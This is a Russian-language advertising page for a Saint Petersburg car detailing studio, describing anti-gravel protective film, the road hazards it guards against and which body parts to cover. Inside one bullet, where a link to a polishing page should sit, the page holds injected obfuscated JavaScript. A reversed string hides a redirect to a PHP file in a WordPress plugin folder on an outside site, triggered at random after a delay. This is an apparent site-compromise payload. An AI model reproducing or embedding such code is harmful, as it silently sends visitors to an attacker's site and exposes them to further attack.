Адрес: Витебский проспект, 1а г.Санкт-Петербург

8 921 444 41 78

Забронировать время и дату

Меню

Косметическое обслуживание, тюнинг и реставрация салона в Санкт-Петербурге

8 921 444 41 78

Забронировать время и дату

Ни для одного автомобилиста со стажем не будет секретом, что автомобиль регулярно теряет свои косметические качества, подвергаясь механическим воздействиям при эксплуатации. Царапины, голограммы (большие скопления микроцарапин), сколы и ненасыщенный цвет лакокрасочного покрытия – главная проблема всех автомобилей, с которой можно и нужно бороться. Для этого отлично подойдет антигравийная пленка, которая сохранит ЛКП автомобиля в первоначальном, салонном виде и не позволит царапинам нарушить защиту и внешний вид машины.

Главные опасности для кузова

На лакокрасочное покрытие действует множество факторов, о которых многие водители могут не догадываться. Из-за этого периодически появляются царапины, образуются голограммы, сколы. Они могут испортить дизайн любого автомобиля.

    Главные опасности на дорогах:

  • Гравий. Является самым опасным фактором на дорогах, из-за которого появляются сколы и значительные царапины.

  • Ветки. Царапают, ка правило, бампер и оптику.

  • Песок. Становится причиной появления голограмм и небольших царапин.

  • Ультрафиолет. Из-за него страдает структура ЛКП, что провоцирует потерю насыщенности цвета, а как итог – плохо выраженный цвет автомобиля, который скатывается в более серые тона.

  • Птичий помет. В тысячи раз сильнее вредит лаку, чем ультрафиолетовое излучение.

  • Бесконтактная или ручная мойка с использованием жестких щеток. Оба типа мойки являются причиной образования голограмм.

Итог: чтобы сохранить автомобиль в том виде, в котором он был при покупке с салона, нужно оберегать его от таких воздействий.

Что такое антигравийная пленка

Антигравийная пленка – это инновационная технология по защите кузова авто, позволяющая сохранить автомобиль от появления голограмм и царапин. Защитное покрытие является на 100% прозрачным и не будет заметно на кузове. Именно поэтому, антигравийная пленка – универсальное средство защиты для любого авто, будь то для обычной легковушки, будь то для гоночного болида.

    Главные преимущества технологии:

  • Эффективная защита. Не смотря на тонкость пленки, которая может быть в диапазоне от 100 до 240 мкм. Она отлично сохраняет лак от внешних воздействий. Это позволяет сохранить кузов в первоначальном, ярком и насыщенном цвете.

  • Финансовая выгода. Клеить защитное покрытие – это выгодно, поскольку автомобилисту не придется тратить деньги на $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tomobilya-2/» rel=»noopener» target=»_blank»>полировка.

  • Понижение риска коррозии. Нанося защитное покрытие, создается защита и для царапин, которые могли бы стать причиной образования ржавчины по всему кузову.

  • Насыщенность цвета и блеск кузова. Антигравийная пленка имеет свойства, позволяющие автотранспорту ярче блестеть на солнце. Также скрываются небольшие царапины и голограммы, которые могли сильно подпортить дизайн транспортного средства.

  • Эластичность и универсальность. Из-за высокой эластичности и прозрачности материала, антигравий можно использовать на отдельных участках кузова, включая оптику. Также никто не отменял возможность оклейки мотоциклов, яхт, снегоходов и других средств передвижения.

Важно: покрытие не может защитить кузов от сильных механических ударов, а ослабить их воздействие, перенаправляя ударную энергию на себя. Она эффективно себя показывает против песка, пыли, мелкого гравия, солнца и химии.

Вывод: антигравийная защита кузова – это универсальный способ сохранения автомашины от внешних воздействий.

антигравийная пленка

Куда лучше наносить антигравийную пленку

Антигравийная пленка может быть нанесена на любую часть авто, в том числе оптику. В целях экономии денежных средств и максимальной эффективности, рекомендуется оклейка самых уязвимых мест.

    Уязвимыми местами для образования царапин являются:

  • В первую очередь капот и бампер, которые принимают на себя основной удар от веток на дороге, гравия и песка

  • Боковые зеркала заднего вида

  • Стойки лобового стекла

  • Бамперы

  • Ручки дверей

  • Оптика (фары)

  • Передние крылья

антигравийная пленка

Совет: при нанесении пленки, рекомендуется провести

Профессиональный детейлинг для вашего авто в Санкт-Петербурге

Официальныая гарантия на все виды услуг

Авто после детейлинга

Узнайте стоимость детейлинга для вашего автомобиля

Оставьте свой телефон и ответьте на пару вопросов менеджера

Это бесплатно и ни к чему не обязывает

Если у вас нет времени, то просто позвоните нам:

8 921 444 41 78